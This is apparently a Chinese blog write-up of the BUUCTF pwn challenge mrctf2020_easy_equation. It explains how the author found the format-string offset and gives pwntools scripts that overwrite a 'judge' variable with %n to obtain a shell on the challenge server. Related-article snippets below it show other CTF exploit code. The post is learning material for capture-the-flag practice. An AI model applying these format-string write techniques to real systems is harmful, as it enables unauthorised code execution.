BUUCTF(pwn)mrctf2020_easy_equation

最新推荐文章于 2022-05-09 20:00:00 发布
最新推荐文章于 2022-05-09 20:00:00 发布
阅读量598 收藏
点赞数 1
分类专栏: pwn题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556441/article/details/115337729
版权

这道题是个相对简单的格式化字符串的题目, 但是做题过程中需要自己的一些debug调试查看;

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
计算偏移量

在这里插入图片描述
初看偏移量是8;

构建初始payload,EXP;payload="aa%8$n"+p64(judge)

from pwn import*
context.log_level='debug'
p=remote('node3.buuoj.cn',27636)
judge=0x60105c
payload="aa%8$n"+p64(judge)
p.sendline(payload)
p.interactive()

由于64位传参,可能存在被/x00截断的情况,
在这里插入图片描述
所以偏移这里是9

payload="aa%9$nAAA"+p64(judge)

在这里插入图片描述

from pwn import*
context.log_level='debug'
p=remote('node3.buuoj.cn',27636)
judge=0x60105c
payload="aa%9$nAAA"+p64(judge)
p.sendline(payload)
p.interactive()

AAA用来补站位;

%n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置

半岛铁盒@
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
[BUUCTF]-PWN:mrctf2020_easy_equation解析
2301_79326813的博客
02-03 358
查看保护再看ida很明了,题目就是让我们用格式化字符串漏洞修改judge的值(可以用python脚本进行计算,最终算出来得2)使等式成立,然后getshell。虽然操作比较简单,但我还是列出了几种方法。
[BUUCTF]PWN——mrctf2020_easy_equation(格式化字符串)
mcmuyanga的博客
01-28 1047
mrctf2020_easy_equation 附件 步骤 例行检查,64位程序,只开启了nx保护 本地试运行一下,看看大概的情况,%p,那边,明显的格式化字符串漏洞 64位ida载入 只要满足第8行的条件即可获取shell,python算一下得到结果是2 所以这题是用格式化字符串漏洞,将judge上的值修改称即可 利用过程 确定偏移量,补了一个b之后偏移是8 由于64位传参,肯定存在被/x00截断的情况,所以我动调看了一下 我们要做的是将judge里的值修改成2,一开始我是这样写的,pa
mrctf2020_easy_equation
z1r0的博客
12-31 602
mrctf2020_easy_equation 查看保护 满足这个if则给一个shell。有一个格式化,用格式化改judge为2即可。 偏移为8,但是实际得调用成9。 调得9即可。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 29467) else:
BUUCTF--equation
Hk_Mayfly的博客
04-09 1069
测试文件:https://www.lanzous.com/ib50p4f 代码分析 在题目中已经提到了对代码进行Fuck混淆,因此对于if中的代码,我们只需要解码,让flag满足要求即可。 第一种解法 http://codertab.com/JsUnFuck 可以到这个网站,将混淆的代码一部分一部分的解,不过过程很繁琐... 第二种解法 使用脚本解码 <scrip...
BUUCTF Reverse/equation (jsfuck)
ookami6497的博客
02-13 860
下载得到一个html文件,打开可以看到代码,很简洁,只要满足if语句中的条件就行。flag就存放在 l 这个数组里面 在控制台里面输入if语句中的条件,也只能得到false,不能直接得到完整的代码 只输入一部分倒是可以,但是太繁琐了,网站解码也不能完全解码出来 我在GitHub上找了下,看到个unjsfuck的脚本,用python实现的。也可以使用js脚本,来源于大佬的博客,js脚本要简洁很多 进入你安装python的那个文件夹,比如我的就是 f:\Python\Scripts,然..
buuctf刷题记录24 equation
ytj00的博客
08-08 468
这道题又一次加强了我的z3 题目有个html打开得到 根据题目提示这个是f**k加密 可以到在线网站上一个个去解密,但是太麻烦了,用了个网上的脚本, 得到 最后有一个常量没解,放到上面网站解出81 头疼,全是解方程,可以用z3来解 构造脚本麻烦死了, from z3 import * if __name__ == "__main__": s = Solver() l = [Int('l[%d]' % i) for i in range(42)] #定义l[0] - l[41
mrctf2020_easyrop
z1r0的博客
04-10 348
mrctf2020_easyrop 查看保护 简单题 用hehe和byby这两个函数配合起来rop就行 from pwn import * from time import sleep context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ll = lambda x : print('\x1
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
Pulse Width modulation using Verilog HDL
2020MRCTF - 部分Pwn
weixin_44864859的博客
04-09 313
easyoverflow 保护全开,但这里只需要栈溢出覆盖数据满足check函数判断就好了。 exp: from pwn import * context.log_level = 'debug' p = remote('38.39.244.2',28082) payload="a"*48 + "n0t_r3@11y_f1@g" p.sendline(payload) p.interacti...
[BUUCTF]PWN——mrctf2020_easyoverflow
mcmuyanga的博客
01-12 922
mrctf2020_easyoverflow 附件 步骤: 例行检查,64位程序,保护全开 本地试运行的时候就直接一个输入,然后就没了,直接用64位ida打开 只要满足18行的条件,就能够获取shell check() 很简单的检查,就是判断一下v5是否等于n0t_r3@11y_f1@g 看main函数可以知道,v5一开始是ju3t_@_f@k3_f1@g,之后没有对v5的操作了,然后让我们输入v4,看一下v4和v5在栈上的位置,发现v5就在v4下方不远处 v4的输入是用的gets函数,我们可以在
[buuctf.reverse] 63 equation
weixin_52640415的博客
05-09 403
附件是js的,js不用反编译但并不比汇编更好懂。 仔细看就是用brainfuck写的程序,大意是 (l[8]-l[3]+... == 8) && ( ...) ... 写了一小段处理一下,然后用numpy.linalg求解行列式。 from js2py import EvalJs js = EvalJs() a = open('a.txt', 'r').readlines('&&') v = "<script lang=javascript>" na
BUUCTF------mrctf2020_easyoverflow
qq_33010875的博客
10-08 302
环境:WSL2,ubuntu16.04,python2 checksec文件: 拖入ida分析: main函数中就有system(‘bin/sh’),只要check函数的返回值为1即可执行 查看check函数: 只要a1和fake_flag相等,函数就能返回1 a1就是main函数里的v5,值为:ju3t_@_f@k3_f1@g fake_flag的值为:n0t_r3@11y_f1@g 只要将v5的值覆盖为n0t_r3@11y_f1@g即可 main函数中有get函数可用, v4: v4是var_
[BUUCTF-pwn]——mrctf2020_easyoverflow
Y_peak的博客
03-29 211
[BUUCTF-pwn]——mrctf2020_easyoverflow 题目不难这里就简单讲下思路 思路 因为check函数返回0才可以得到shell. 通过gets函数,我们可以将v5修改为我们想要的。 找到fake_flag 为n0t_r3@11y_f1@g 修改为这个就可以了。相同肯定返回0. exploit from pwn import * p = remote("node3.buuoj.cn",26609) payload = 'a'* 0x30 + "n0t_r3@11y_f1@g" p.s
[MRCTF2020]EasyCpp
m0_46296905的博客
04-20 844
题目:[MRCTF2020]EasyCpp 这题是一个用g++编译的C++逆向题,第一次碰到这种类型,边做边学习吧。 因为是初次接触C++逆向,如有不足,欢迎评论区指正。 一、main IDA64查看main函数的伪代码如下,各个反汇编后伪代码的注释也已经给出,仅供参考: int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rax __int64 v4; // rbx __int6
BUUCTF-----actf_2019_babyheap (UAF)
半岛铁盒的博客
06-15 6182
这道题和之前做的 hitcontraining_uaf 这道题类似 64位程序,没开PIE 并且这里发现了 bin/sh 字符串
matlab 'navier_stokes_equation
最新发布
06-13
Navier-Stokes方程是描述流体运动的基本方程,包括质量守恒、动量守恒和能量守恒三个方程。在MATLAB中,可以通过有限元方法或有限差分方法来数值求解Navier-Stokes方程。 具体实现可以分为以下几个步骤: 1. 建立模型并确定边界条件。 2. 将Navier-Stokes方程离散化,得到有限元方程或有限差分方程。 3. 通过迭代方法求解方程组,得到流体的速度和压力分布。 4. 可以通过绘图等方式展示流体运动的过程和结果。 需要注意的是,Navier-Stokes方程求解是一个计算量较大的过程,需要充分利用计算资源和优化算法,以提高求解效率和精度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值